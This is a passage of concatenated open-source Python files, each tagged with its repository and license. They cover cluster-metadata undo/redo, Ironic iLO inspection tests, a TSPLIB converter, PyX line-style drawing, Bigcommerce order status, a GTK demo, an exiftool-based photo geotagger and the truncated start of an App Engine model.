old_spikes_per_cluster={}, # only for the affected clusters
new_spikes_per_cluster={}, # only for the affected clusters
selection=[], # clusters selected before the action
)
d.update(kwargs)
super(UpdateInfo, self).__init__(d)
def __repr__(self):
desc = self.description
h = ' ({})'.format(self.history) if self.history else ''
if not desc:
return '<UpdateInfo>'
elif desc in ('merge', 'assign'):
a, d = _join(self.added), _join(self.deleted)
return '<{desc}{h} {d} => {a}>'.format(desc=desc,
a=a,
d=d,
h=h,
)
elif desc.startswith('metadata'):
c = _join(self.metadata_changed)
m = self.metadata_value
return '<{desc}{h} {c} => {m}>'.format(desc=desc,
c=c,
m=m,
h=h,
)
return '<UpdateInfo>'
#------------------------------------------------------------------------------
# ClusterMetadataUpdater class
#------------------------------------------------------------------------------
class ClusterMetadataUpdater(object):
"""Handle cluster metadata changes."""
def __init__(self, cluster_metadata):
self._cluster_metadata = cluster_metadata
# Keep a deep copy of the original structure for the undo stack.
self._data_base = deepcopy(cluster_metadata.data)
# The stack contains (clusters, field, value, update_info) tuples.
self._undo_stack = History((None, None, None, None))
for field, func in self._cluster_metadata._fields.items():
# Create self.<field>(clusters).
def _make_get(field):
def f(clusters):
return self._cluster_metadata._get(clusters, field)
return f
setattr(self, field, _make_get(field))
# Create self.set_<field>(clusters, value).
def _make_set(field):
def f(clusters, value):
return self._set(clusters, field, value)
return f
setattr(self, 'set_{0:s}'.format(field), _make_set(field))
def _set(self, clusters, field, value, add_to_stack=True):
self._cluster_metadata._set(clusters, field, value)
clusters = _as_list(clusters)
info = UpdateInfo(description='metadata_' + field,
metadata_changed=clusters,
metadata_value=value,
)
if add_to_stack:
self._undo_stack.add((clusters, field, value, info))
return info
def undo(self):
"""Undo the last metadata change.
Returns
-------
up : UpdateInfo instance
"""
args = self._undo_stack.back()
if args is None:
return
self._cluster_metadata._data = deepcopy(self._data_base)
for clusters, field, value, _ in self._undo_stack:
if clusters is not None:
self._set(clusters, field, value, add_to_stack=False)
# Return the UpdateInfo instance of the undo action.
info = args[-1]
info.history = 'undo'
return info
def redo(self):
"""Redo the next metadata change.
Returns
-------
up : UpdateInfo instance
"""
args = self._undo_stack.forward()
if args is None:
return
clusters, field, value, info = args
self._set(clusters, field, value, add_to_stack=False)
# Return the UpdateInfo instance of the redo action.
info.history = 'redo'
return info
| nsteinme/phy | phy/cluster/manual/_utils.py | Python | bsd-3-clause | 5,749 |
# Copyright 2014 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Test class for Management Interface used by iLO modules."""
import mock
from oslo_config import cfg
from ironic.common import exception
from ironic.common import states
from ironic.common import utils
from ironic.conductor import task_manager
from ironic.conductor import utils as conductor_utils
from ironic.db import api as dbapi
from ironic.drivers.modules.ilo import common as ilo_common
from ironic.drivers.modules.ilo import inspect as ilo_inspect
from ironic.drivers.modules.ilo import power as ilo_power
from ironic.tests.conductor import utils as mgr_utils
from ironic.tests.db import base as db_base
from ironic.tests.db import utils as db_utils
from ironic.tests.objects import utils as obj_utils
INFO_DICT = db_utils.get_test_ilo_info()
CONF = cfg.CONF
class IloInspectTestCase(db_base.DbTestCase):
def setUp(self):
super(IloInspectTestCase, self).setUp()
mgr_utils.mock_the_extension_manager(driver="fake_ilo")
self.node = obj_utils.create_test_node(
self.context, driver='fake_ilo', driver_info=INFO_DICT)
def test_get_properties(self):
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
properties = ilo_common.REQUIRED_PROPERTIES.copy()
self.assertEqual(properties,
task.driver.inspect.get_properties())
@mock.patch.object(ilo_common, 'parse_driver_info', spec_set=True,
autospec=True)
def test_validate(self, driver_info_mock):
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
task.driver.inspect.validate(task)
driver_info_mock.assert_called_once_with(task.node)
@mock.patch.object(ilo_inspect, '_get_capabilities', spec_set=True,
autospec=True)
@mock.patch.object(ilo_inspect, '_create_ports_if_not_exist',
spec_set=True, autospec=True)
@mock.patch.object(ilo_inspect, '_get_essential_properties', spec_set=True,
autospec=True)
@mock.patch.object(ilo_power.IloPower, 'get_power_state', spec_set=True,
autospec=True)
@mock.patch.object(ilo_common, 'get_ilo_object', spec_set=True,
autospec=True)
def test_inspect_essential_ok(self, get_ilo_object_mock,
power_mock,
get_essential_mock,
create_port_mock,
get_capabilities_mock):
ilo_object_mock = get_ilo_object_mock.return_value
properties = {'memory_mb': '512', 'local_gb': '10',
'cpus': '1', 'cpu_arch': 'x86_64'}
macs = {'Port 1': 'aa:aa:aa:aa:aa:aa', 'Port 2': 'bb:bb:bb:bb:bb:bb'}
capabilities = ''
result = {'properties': properties, 'macs': macs}
get_essential_mock.return_value = result
get_capabilities_mock.return_value = capabilities
power_mock.return_value = states.POWER_ON
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
task.driver.inspect.inspect_hardware(task)
self.assertEqual(properties, task.node.properties)
power_mock.assert_called_once_with(mock.ANY, task)
get_essential_mock.assert_called_once_with(task.node,
ilo_object_mock)
get_capabilities_mock.assert_called_once_with(task.node,
ilo_object_mock)
create_port_mock.assert_called_once_with(task.node, macs)
@mock.patch.object(ilo_inspect, '_get_capabilities', spec_set=True,
autospec=True)
@mock.patch.object(ilo_inspect, '_create_ports_if_not_exist',
spec_set=True, autospec=True)
@mock.patch.object(ilo_inspect, '_get_essential_properties', spec_set=True,
autospec=True)
@mock.patch.object(conductor_utils, 'node_power_action', spec_set=True,
autospec=True)
@mock.patch.object(ilo_power.IloPower, 'get_power_state', spec_set=True,
autospec=True)
@mock.patch.object(ilo_common, 'get_ilo_object', spec_set=True,
autospec=True)
def test_inspect_essential_ok_power_off(self, get_ilo_object_mock,
power_mock,
set_power_mock,
get_essential_mock,
create_port_mock,
get_capabilities_mock):
ilo_object_mock = get_ilo_object_mock.return_value
properties = {'memory_mb': '512', 'local_gb': '10',
'cpus': '1', 'cpu_arch': 'x86_64'}
macs = {'Port 1': 'aa:aa:aa:aa:aa:aa', 'Port 2': 'bb:bb:bb:bb:bb:bb'}
capabilities = ''
result = {'properties': properties, 'macs': macs}
get_essential_mock.return_value = result
get_capabilities_mock.return_value = capabilities
power_mock.return_value = states.POWER_OFF
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
task.driver.inspect.inspect_hardware(task)
self.assertEqual(properties, task.node.properties)
power_mock.assert_called_once_with(mock.ANY, task)
set_power_mock.assert_any_call(task, states.POWER_ON)
get_essential_mock.assert_called_once_with(task.node,
ilo_object_mock)
get_capabilities_mock.assert_called_once_with(task.node,
ilo_object_mock)
create_port_mock.assert_called_once_with(task.node, macs)
@mock.patch.object(ilo_inspect, '_get_capabilities', spec_set=True,
autospec=True)
@mock.patch.object(ilo_inspect, '_create_ports_if_not_exist',
spec_set=True, autospec=True)
@mock.patch.object(ilo_inspect, '_get_essential_properties', spec_set=True,
autospec=True)
@mock.patch.object(ilo_power.IloPower, 'get_power_state', spec_set=True,
autospec=True)
@mock.patch.object(ilo_common, 'get_ilo_object', spec_set=True,
autospec=True)
def test_inspect_essential_capabilities_ok(self, get_ilo_object_mock,
power_mock,
get_essential_mock,
create_port_mock,
get_capabilities_mock):
ilo_object_mock = get_ilo_object_mock.return_value
properties = {'memory_mb': '512', 'local_gb': '10',
'cpus': '1', 'cpu_arch': 'x86_64'}
macs = {'Port 1': 'aa:aa:aa:aa:aa:aa', 'Port 2': 'bb:bb:bb:bb:bb:bb'}
capability_str = 'BootMode:uefi'
capabilities = {'BootMode': 'uefi'}
result = {'properties': properties, 'macs': macs}
get_essential_mock.return_value = result
get_capabilities_mock.return_value = capabilities
power_mock.return_value = states.POWER_ON
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
task.driver.inspect.inspect_hardware(task)
expected_properties = {'memory_mb': '512', 'local_gb': '10',
'cpus': '1', 'cpu_arch': 'x86_64',
'capabilities': capability_str}
self.assertEqual(expected_properties, task.node.properties)
power_mock.assert_called_once_with(mock.ANY, task)
get_essential_mock.assert_called_once_with(task.node,
ilo_object_mock)
get_capabilities_mock.assert_called_once_with(task.node,
ilo_object_mock)
create_port_mock.assert_called_once_with(task.node, macs)
@mock.patch.object(ilo_inspect, '_get_capabilities', spec_set=True,
autospec=True)
@mock.patch.object(ilo_inspect, '_create_ports_if_not_exist',
spec_set=True, autospec=True)
@mock.patch.object(ilo_inspect, '_get_essential_properties', spec_set=True,
autospec=True)
@mock.patch.object(ilo_power.IloPower, 'get_power_state', spec_set=True,
autospec=True)
@mock.patch.object(ilo_common, 'get_ilo_object', spec_set=True,
autospec=True)
def test_inspect_essential_capabilities_exist_ok(self, get_ilo_object_mock,
power_mock,
get_essential_mock,
create_port_mock,
get_capabilities_mock):
ilo_object_mock = get_ilo_object_mock.return_value
properties = {'memory_mb': '512', 'local_gb': '10',
'cpus': '1', 'cpu_arch': 'x86_64',
'somekey': 'somevalue'}
macs = {'Port 1': 'aa:aa:aa:aa:aa:aa', 'Port 2': 'bb:bb:bb:bb:bb:bb'}
result = {'properties': properties, 'macs': macs}
capabilities = {'BootMode': 'uefi'}
get_essential_mock.return_value = result
get_capabilities_mock.return_value = capabilities
power_mock.return_value = states.POWER_ON
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
task.node.properties = {'capabilities': 'foo:bar'}
expected_capabilities = ('BootMode:uefi,'
'foo:bar')
set1 = set(expected_capabilities.split(','))
task.driver.inspect.inspect_hardware(task)
end_capabilities = task.node.properties['capabilities']
set2 = set(end_capabilities.split(','))
self.assertEqual(set1, set2)
expected_properties = {'memory_mb': '512', 'local_gb': '10',
'cpus': '1', 'cpu_arch': 'x86_64',
'capabilities': end_capabilities}
power_mock.assert_called_once_with(mock.ANY, task)
self.assertEqual(task.node.properties, expected_properties)
get_essential_mock.assert_called_once_with(task.node,
ilo_object_mock)
get_capabilities_mock.assert_called_once_with(task.node,
ilo_object_mock)
create_port_mock.assert_called_once_with(task.node, macs)
class TestInspectPrivateMethods(db_base.DbTestCase):
def setUp(self):
super(TestInspectPrivateMethods, self).setUp()
mgr_utils.mock_the_extension_manager(driver="fake_ilo")
self.node = obj_utils.create_test_node(
self.context, driver='fake_ilo', driver_info=INFO_DICT)
@mock.patch.object(ilo_inspect.LOG, 'info', spec_set=True, autospec=True)
@mock.patch.object(dbapi, 'get_instance', spec_set=True, autospec=True)
def test__create_ports_if_not_exist(self, instance_mock, log_mock):
db_obj = instance_mock.return_value
macs = {'Port 1': 'aa:aa:aa:aa:aa:aa', 'Port 2': 'bb:bb:bb:bb:bb:bb'}
node_id = self.node.id
port_dict1 = {'address': 'aa:aa:aa:aa:aa:aa', 'node_id': node_id}
port_dict2 = {'address': 'bb:bb:bb:bb:bb:bb', 'node_id': node_id}
ilo_inspect._create_ports_if_not_exist(self.node, macs)
instance_mock.assert_called_once_with()
self.assertTrue(log_mock.called)
db_obj.create_port.assert_any_call(port_dict1)
db_obj.create_port.assert_any_call(port_dict2)
@mock.patch.object(ilo_inspect.LOG, 'warn', spec_set=True, autospec=True)
@mock.patch.object(dbapi, 'get_instance', spec_set=True, autospec=True)
def test__create_ports_if_not_exist_mac_exception(self,
instance_mock,
log_mock):
dbapi_mock = instance_mock.return_value
dbapi_mock.create_port.side_effect = exception.MACAlreadyExists('f')
macs = {'Port 1': 'aa:aa:aa:aa:aa:aa', 'Port 2': 'bb:bb:bb:bb:bb:bb'}
ilo_inspect._create_ports_if_not_exist(self.node, macs)
instance_mock.assert_called_once_with()
self.assertTrue(log_mock.called)
def test__get_essential_properties_ok(self):
ilo_mock = mock.MagicMock(spec=['get_essential_properties'])
properties = {'memory_mb': '512', 'local_gb': '10',
'cpus': '1', 'cpu_arch': 'x86_64'}
macs = {'Port 1': 'aa:aa:aa:aa:aa:aa', 'Port 2': 'bb:bb:bb:bb:bb:bb'}
result = {'properties': properties, 'macs': macs}
ilo_mock.get_essential_properties.return_value = result
actual_result = ilo_inspect._get_essential_properties(self.node,
ilo_mock)
self.assertEqual(result, actual_result)
def test__get_essential_properties_fail(self):
ilo_mock = mock.MagicMock(
spec=['get_additional_capabilities', 'get_essential_properties'])
# Missing key: cpu_arch
properties = {'memory_mb': '512', 'local_gb': '10',
'cpus': '1'}
macs = {'Port 1': 'aa:aa:aa:aa:aa:aa', 'Port 2': 'bb:bb:bb:bb:bb:bb'}
result = {'properties': properties, 'macs': macs}
ilo_mock.get_essential_properties.return_value = result
result = self.assertRaises(exception.HardwareInspectionFailure,
ilo_inspect._get_essential_properties,
self.node,
ilo_mock)
self.assertEqual(
result.format_message(),
("Failed to inspect hardware. Reason: Server didn't return the "
"key(s): cpu_arch"))
def test__get_essential_properties_fail_invalid_format(self):
ilo_mock = mock.MagicMock(
spec=['get_additional_capabilities', 'get_essential_properties'])
# Not a dict
properties = ['memory_mb', '512', 'local_gb', '10',
'cpus', '1']
macs = ['aa:aa:aa:aa:aa:aa', 'bb:bb:bb:bb:bb:bb']
capabilities = ''
result = {'properties': properties, 'macs': macs}
ilo_mock.get_essential_properties.return_value = result
ilo_mock.get_additional_capabilities.return_value = capabilities
self.assertRaises(exception.HardwareInspectionFailure,
ilo_inspect._get_essential_properties,
self.node, ilo_mock)
def test__get_essential_properties_fail_mac_invalid_format(self):
ilo_mock = mock.MagicMock(spec=['get_essential_properties'])
properties = {'memory_mb': '512', 'local_gb': '10',
'cpus': '1', 'cpu_arch': 'x86_64'}
# Not a dict
macs = 'aa:aa:aa:aa:aa:aa'
result = {'properties': properties, 'macs': macs}
ilo_mock.get_essential_properties.return_value = result
self.assertRaises(exception.HardwareInspectionFailure,
ilo_inspect._get_essential_properties,
self.node, ilo_mock)
def test__get_essential_properties_hardware_port_empty(self):
ilo_mock = mock.MagicMock(
spec=['get_additional_capabilities', 'get_essential_properties'])
properties = {'memory_mb': '512', 'local_gb': '10',
'cpus': '1', 'cpu_arch': 'x86_64'}
# Not a dictionary
macs = None
result = {'properties': properties, 'macs': macs}
capabilities = ''
ilo_mock.get_essential_properties.return_value = result
ilo_mock.get_additional_capabilities.return_value = capabilities
self.assertRaises(exception.HardwareInspectionFailure,
ilo_inspect._get_essential_properties,
self.node, ilo_mock)
def test__get_essential_properties_hardware_port_not_dict(self):
ilo_mock = mock.MagicMock(spec=['get_essential_properties'])
properties = {'memory_mb': '512', 'local_gb': '10',
'cpus': '1', 'cpu_arch': 'x86_64'}
# Not a dict
macs = 'aa:bb:cc:dd:ee:ff'
result = {'properties': properties, 'macs': macs}
ilo_mock.get_essential_properties.return_value = result
result = self.assertRaises(
exception.HardwareInspectionFailure,
ilo_inspect._get_essential_properties, self.node, ilo_mock)
@mock.patch.object(utils, 'get_updated_capabilities', spec_set=True,
autospec=True)
def test__get_capabilities_ok(self, capability_mock):
ilo_mock = mock.MagicMock(spec=['get_server_capabilities'])
capabilities = {'ilo_firmware_version': 'xyz'}
ilo_mock.get_server_capabilities.return_value = capabilities
cap = ilo_inspect._get_capabilities(self.node, ilo_mock)
self.assertEqual(cap, capabilities)
def test__validate_ok(self):
properties = {'memory_mb': '512', 'local_gb': '10',
'cpus': '2', 'cpu_arch': 'x86_arch'}
macs = {'Port 1': 'aa:aa:aa:aa:aa:aa'}
data = {'properties': properties, 'macs': macs}
valid_keys = set(ilo_inspect.ESSENTIAL_PROPERTIES_KEYS)
ilo_inspect._validate(self.node, data)
self.assertEqual(sorted(set(properties)), sorted(valid_keys))
def test__validate_essential_keys_fail_missing_key(self):
properties = {'memory_mb': '512', 'local_gb': '10',
'cpus': '1'}
macs = {'Port 1': 'aa:aa:aa:aa:aa:aa'}
data = {'properties': properties, 'macs': macs}
self.assertRaises(exception.HardwareInspectionFailure,
ilo_inspect._validate, self.node, data)
| Tan0/ironic | ironic/tests/drivers/ilo/test_inspect.py | Python | apache-2.0 | 19,077 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
import sys
from utils.benchmark import get_value, get_matrix, parse_node_coords
# Generate a json-formatted problem from a tsplib file.
TSP_FIELDS = ["NAME", "TYPE", "COMMENT", "DIMENSION", "EDGE_WEIGHT_TYPE"]
def parse_tsp(input_file):
with open(input_file, "r") as f:
lines = f.readlines()
# Remember main fields describing the problem type.
meta = {}
for s in TSP_FIELDS:
data = get_value(s, lines)
if data:
meta[s] = data
# Only support EUC_2D for now.
if ("EDGE_WEIGHT_TYPE" not in meta) or (meta["EDGE_WEIGHT_TYPE"] != "EUC_2D"):
print(" - Unsupported EDGE_WEIGHT_TYPE: " + meta["EDGE_WEIGHT_TYPE"] + ".")
exit(0)
meta["DIMENSION"] = int(meta["DIMENSION"])
# Find start of nodes descriptions.
node_start = next(
(i for i, s in enumerate(lines) if s.startswith("NODE_COORD_SECTION"))
)
# Use first line as vehicle start/end.
coord_line = parse_node_coords(lines[node_start + 1])
coords = [[float(coord_line[1]), float(coord_line[2])]]
vehicle = {
"id": int(coord_line[0]),
"start": [float(coord_line[1]), float(coord_line[2])],
"start_index": 0,
"end": [float(coord_line[1]), float(coord_line[2])],
"end_index": 0,
}
# Remaining lines are jobs.
jobs = []
for i in range(node_start + 2, node_start + 1 + meta["DIMENSION"]):
coord_line = parse_node_coords(lines[i])
coords.append([float(coord_line[1]), float(coord_line[2])])
jobs.append(
{
"id": int(coord_line[0]),
"location": [float(coord_line[1]), float(coord_line[2])],
"location_index": i - node_start - 1,
}
)
matrix = get_matrix(coords)
return {"meta": meta, "vehicles": [vehicle], "jobs": jobs, "matrix": matrix}
if __name__ == "__main__":
input_file = sys.argv[1]
output_name = input_file[: input_file.rfind(".tsp")] + ".json"
print("- Writing problem " + input_file + " to " + output_name)
json_input = parse_tsp(input_file)
with open(output_name, "w") as out:
json.dump(json_input, out)
| VROOM-Project/vroom-scripts | src/tsplib_to_json.py | Python | bsd-2-clause | 2,243 |
from pyx import *
text.set(text.LatexRunner)
text.preamble(r"\renewcommand{\familydefault}{\ttdefault}")
c = canvas.canvas()
# positioning is quite ugly ... but it works at the moment
x = 0
y = 0
dx = 6
dy = -0.65
length = 0.8
def drawstyle(name, showpath=0, default=0):
global x,y
p = path.path(path.moveto(x + 0.1, y+0.1 ),
path.rlineto(length/2.0, 0.3),
path.rlineto(length/2.0, -0.3))
c.stroke(p, [style.linewidth.THIck, eval("style."+name)])
if showpath:
c.stroke(p, [style.linewidth.Thin, color.gray.white])
if default:
name = name + r"\rm\quad (default)"
c.text(x + 1.5, y + 0.15, name, [text.size.footnotesize])
y += dy
if y < -16:
y = 0
x += dx
drawstyle("linecap.butt", showpath=1, default=1)
drawstyle("linecap.round", showpath=1)
drawstyle("linecap.square", showpath=1)
y += dy
drawstyle("linejoin.miter", showpath=1, default=1)
drawstyle("linejoin.round", showpath=1)
drawstyle("linejoin.bevel", showpath=1)
y += dy
drawstyle("linestyle.solid", default=1)
drawstyle("linestyle.dashed")
drawstyle("linestyle.dotted")
drawstyle("linestyle.dashdotted")
y += dy
drawstyle("linewidth.THIN")
drawstyle("linewidth.THIn")
drawstyle("linewidth.THin")
drawstyle("linewidth.Thin")
drawstyle("linewidth.thin")
drawstyle("linewidth.normal", default=1)
drawstyle("linewidth.thick")
drawstyle("linewidth.Thick")
drawstyle("linewidth.THick")
drawstyle("linewidth.THIck")
drawstyle("linewidth.THICk")
drawstyle("linewidth.THICK")
drawstyle("miterlimit.lessthan180deg", showpath=1)
drawstyle("miterlimit.lessthan90deg", showpath=1)
drawstyle("miterlimit.lessthan60deg", showpath=1)
drawstyle("miterlimit.lessthan45deg", showpath=1)
drawstyle("miterlimit.lessthan11deg", showpath=1, default=1)
y += dy
drawstyle("dash((1, 1, 2, 2, 3, 3), 0)")
drawstyle("dash((1, 1, 2, 2, 3, 3), 1)")
drawstyle("dash((1, 2, 3), 2)")
drawstyle("dash((1, 2, 3), 3)")
drawstyle("dash((1, 2, 3), 4)")
drawstyle("dash((1, 2, 3), rellengths=1)")
c.writePDFfile()
| mjg/PyX-svn | manual/pathstyles.py | Python | gpl-2.0 | 2,061 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
'''
Developer Navdeep Ghai
Email navdeep@korecent.com
'''
import frappe
import bcommerce
from frappe.utils import cint, cstr, flt, nowdate
from frappe import _, msgprint, throw
'''
Order status
'''
def get_order_status(status_id):
status = {
0:
{"name":"Incomplete", "order":0},
1:
{ "name":"Pending", "order":1},
2:
{ "name":"Shipped", "order":2},
3:
{ "name":"Partially Shipped", "order":3},
4:
{"name":"Refunded", "order":4},
5:
{ "name":"Cancelled", "order":5},
6:
{"name":"Declined", "order":6},
7:
{ "name":"Awaiting Payment", "order":7},
8:
{ "name":"Awaiting Pickup", "order":8},
9:
{"name":"Awaiting Shipment", "order":9},
10:
{ "name":"Completed", "order":10},
11:
{"name":"Awaiting Fulfillment", "order":11},
12:
{"name":"Manual Verificate Required", "order":12},
13:
{ "name":"Disputed", "order":13},
}
return status.get(cint(status_id))
'''
Update order status when customer/admin update the status of order in bigcommerce server
'''
def update_order_status(so_name, status_name, status_id):
data = {"so_name":so_name, "status":status_name, "status_id":status_id}
print data
frappe.db.sql("""Update `tabSales Order` SET bcommerce_order_status=%(status)s, bcommerce_status_id=%(status_id)s \
WHERE name=%(so_name)s AND docstatus=1 """, data)
| navdeepghai/bcommerce | bcommerce/utils/status.py | Python | mit | 1,445 |
#!/usr/bin/env python
import pgi
pgi.install_as_gi()
#from gi.repository import Gtk, GObject
from gi.repository import Gtk
class UI:
def __init__(self):
builder = Gtk.Builder()
builder.add_from_file("gui.glade")
window = builder.get_object('window1')
window.connect("delete-event", Gtk.main_quit)
self.led_button = builder.get_object('togglebutton1')
self.led_button.connect('toggled', self.on_led_button_toggle)
pan_adj = Gtk.Adjustment(value=0, lower=0, upper=360+1, step_increment=1, page_increment=1, page_size=1)
spinBtn = builder.get_object("spinbutton1")
spinBtn.configure(pan_adj, 1, 0)
tilt_adj = Gtk.Adjustment(value=0, lower=-30, upper=30+1, step_increment=1, page_increment=1, page_size=1)
spinBtn = builder.get_object("spinbutton2")
spinBtn.configure(tilt_adj, 1, 0)
window.show_all()
def on_led_button_toggle(self, button):
if button.get_active():
state = ['1', 'on']
button.set_label(state[1].upper())
#self.send_command(state[0])
else:
state = ['0', 'off']
button.set_label(state[1].upper())
#self.send_command(state[0])
UI()
# win = Gtk.Window()
# win.connect("delete-event", Gtk.main_quit)
# win.show_all()
Gtk.main()
| chrisspen/homebot | src/test/head_io/test_gtk.py | Python | mit | 1,346 |
from optparse import OptionParser
from elementtree.ElementTree import Element, SubElement, dump, XML, parse, dump
from bisect import bisect_left, bisect
import re
from os import listdir
import os
import os.path
import sys
pictures_ext = []
verbose = False
def trace(message):
if verbose:
print message
class InvalidRange(Exception):
'''Range invalid exception'''
class InvalidNumber(Exception):
'''File name does not contain a valid number'''
class GeoTagger():
''' Global class that contains ranges '''
def __init__(self, options):
self._ranges = {}
self.options = options
self._start_values = None
def add_range(self, range):
''' Adds the range to the dictionary '''
trace('adding %s'%(range))
self._ranges[range.start] = range
self._start_values = None
def add_ranges(self, ranges):
''' Adds a list of ranges to the dictionary '''
for r in ranges:
self.add_range(r)
def get_range(self, picture_number):
''' Returns the range the picture number belongs to '''
if self._start_values == None:
self._start_values = self._ranges.keys()
self._start_values.sort()
trace('trying to get valid range for %s'%(picture_number))
trace('start ranges %s'%(self._start_values))
candidate_pos = bisect(self._start_values, long(picture_number)) - 1
trace('bisect res %s pos %s value'%(picture_number, candidate_pos))
if candidate_pos == -1:
trace('not pos found for %s'%(picture_number))
raise InvalidRange
candidate_start = self._start_values[candidate_pos] #candidate start because need to check final element of range
trace('candidate start for ' + str(picture_number) + ' ' + str(candidate_start))
range = self._ranges[candidate_start]
if not range.is_suitable(picture_number): #checks if candidate range is valid
trace('not valid range found for' + str(picture_number))
raise InvalidRange
return range
def __repr__():
return 'ranges:' + ranges + ' startranges:' + startRanges
def is_valid_picture_file(self, filename):
''' returns true if the file has the right extension'''
ext = filename.rsplit('.')[-1]
trace(filename + ' extension is ' + ext)
if ext.upper() == self.options.filetype.upper():
trace('is valid file')
return True
return False
def parse_arguments():
parser = OptionParser()
parser.add_option("-g", "--geotaggerfile", dest="geofile", help="location of geotagger xml", default="geotagger.xml")
parser.add_option("-d", "--dir", dest="picdir", help="picture directory", default=".")
parser.add_option("-v", "--verbose", dest="verbose", action="store_true", help="verbose mode on")
parser.add_option("-f", "--fileext", dest="filetype", help="picture file extension", default="jpg")
parser.add_option("-t", "--exiftool", dest="useExifTool", help="force to use exif tool")
parser.add_option("-p", "--preserve", dest="preserve", action="store_true", help="preserve original images")
(options, args) = parser.parse_args()
return options
class Position:
def __init__(self, l, lo, al):
self.latitude, self.longitude, self.altitude = l, lo, al
self.fLat = float(self.latitude)
if self.fLat > 0:
self.latOrientation = 'N'
else:
self.fLat = -self.fLat;
self.latOrientation = 'S'
self.fLong = float(self.longitude)
if self.fLong > 0:
self.longOrientation = 'E'
else:
self.fLong = -self.fLong;
self.longOrientation = 'W'
self.fAltitude = float(al)
def __repr__(self):
return 'lat:' + self.latitude + ' long:' + self.longitude + ' alt:' +self.altitude
class RangePos:
''' Range of picture and related position'''
def __init__(self, start, end, position):
self.start, self.end, self.position = start, end, position
def __init__(self, xmlrange):
''' constructor based from xml row'''
self.start = long(xmlrange.attrib['from'])
self.end = long(xmlrange.attrib['to'])
try:
lat = xmlrange.attrib['latitude']
lon = xmlrange.attrib['longitude']
alt = xmlrange.attrib['altitude']
except:
trace('some attributes not found')
self.position = Position(lat, lon, alt)
def is_suitable(self, picture):
''' tells if a picture number is suitable for the selected range '''
if (picture >= self.start) and (picture <= self.end):
return True
return False
def __repr__(self):
return 'start:' + str(self.start) + ' end:' + str(self.end) + ' pos:' + repr(self.position)
numbersRe = re.compile('[0-9]+') #matches AT LEAST one number
class BasePictureFile:
''' represents the picture file '''
def __init__(self, name, dir):
self._name = name
self._dir = dir
self._file_with_path = self._dir + os.path.sep + self._name
def get_number(self):
res = numbersRe.search(self._name)
if res == None:
raise InvalidNumber
trace('get number for ' + self._name + ' ' + res.group(0))
return long(res.group(0))
class PyPictureFile(BasePictureFile):
''' override the write method using pyexiv2 library'''
def write_exif(self, pos, preserve):
metadata = pyexiv2.ImageMetadata(self._file_with_path)
metadata.read()
tag = metadata['Exif.GPSInfo.GPSLatitudeRef']
tag.value = pos.latOrientation
tag = metadata['Exif.GPSInfo.GPSLatitude']
tag.value = str(pos.fLat)
tag = metadata['Exif.GPSInfo.GPSLongitudeRef']
tag.value = pos.longOrientation
tag = metadata['Exif.GPSInfo.GPSLongitude']
tag.value = str(pos.fLong)
metadata.write()
class ExToolPictureFile(BasePictureFile):
''' override the write method relaying on external exiftool command '''
def write_exif(self, pos, preserve):
if preserve:
override_options = ''
else:
override_options = '-overwrite_original'
if sys.platform != 'win32':
output_file = ''
command = 'exiftool -m -n %s -GPSLongitude=%f -GPSLatitude=%f \
-GPSLongitudeRef=%s -GPSLatitudeRef=%s -GPSAltitude=%f "%s"'\
%(override_options, pos.fLong,pos.fLat,pos.longOrientation,pos.latOrientation,pos.fAltitude,self._file_with_path)
else:
command = 'exiftool.exe -m -n %s -GPSLongitude=%f -GPSLatitude=%f \
-GPSLongitudeRef=%s -GPSLatitudeRef=%s -GPSAltitude=%f "%s"'\
%(override_options, pos.fLong,pos.fLat,pos.longOrientation,pos.latOrientation,pos.fAltitude, self._file_with_path)
trace('Executing ' + command)
os.popen(command)
#TODO switch if import fails
PictureFile = ExToolPictureFile
def process_xml_file(filexml, g):
''' Processes xml file and stores info in ranges contained in g'''
trace('Processing ' + filexml)
tree = parse(filexml)
allranges = tree.findall('range')
for xmlrange in allranges:
trace('processing xml row')
#try:
r = RangePos(xmlrange)
g.add_range(r)
#except:
# trace('unable to handle:')
# if verbose:
# dump(xmlrange)
def ranges_generator(filexml):
''' Processes xml file and stores info in ranges contained in g'''
trace('Processing ' + filexml)
tree = parse(filexml)
allranges = tree.findall('range')
for xmlrange in allranges:
trace('processing xml row')
#try:
yield RangePos(xmlrange)
#except:
# trace('unable to handle:')
# if verbose:
# dump(xmlrange)
def write_info_to_pictures(g, dir, status_report):
'''Writes exif in the pictures stored in dir path'''
trace('trying to write files in ' + dir)
picture_files= filter(g.is_valid_picture_file, listdir(dir))
pictures_num = len(picture_files)
if not pictures_num:
status_report('No pictures found in folder')
return
for file_num, file in enumerate(picture_files):
try:
status_report('Processing %s, %d of %d'%(file, file_num + 1, pictures_num))
p = PictureFile(file, dir)
n = p.get_number() #number from the name of the picture
r = g.get_range(n) #range the number belongs to
trace('Got range '%(r))
p.write_exif(r.position, g.options.preserve)
except InvalidRange:
trace('Range invalid for %s'%(file))
except InvalidNumber:
trace('File %s does not contain a number'%(file))
def load_extensions():
ext_file = open('extensions.ini')
[pictures_ext.append(ext[:-1]) for ext in ext_file] #taking off the \n
if 'JPG' not in pictures_ext:
pictures_ext.append('JPG')
ext_file.close()
def run(options, status_report):
global verbose # TODO Remove me
if options.useExifTool:
trace('forcing to use exiftool')
PictureFile = ExToolPictureFile
verbose = options.verbose
trace('verbose mode on')
load_extensions()
g = GeoTagger(options)
try:
g.add_ranges(ranges_generator(options.geofile))
except:
print 'Unable to process %s'%options.geofile
return
write_info_to_pictures(g, options.picdir, status_report)
def command_line_status_rep(status):
trace(status)
if __name__ == '__main__':
options = parse_arguments()
run(options, command_line_status_rep)
| Sjith/geotagger-1 | py/geotagger.py | Python | gpl-3.0 | 10,087 |
from google.appengine.ext import db
import datetime
import webapp2
class Player(db.Model):
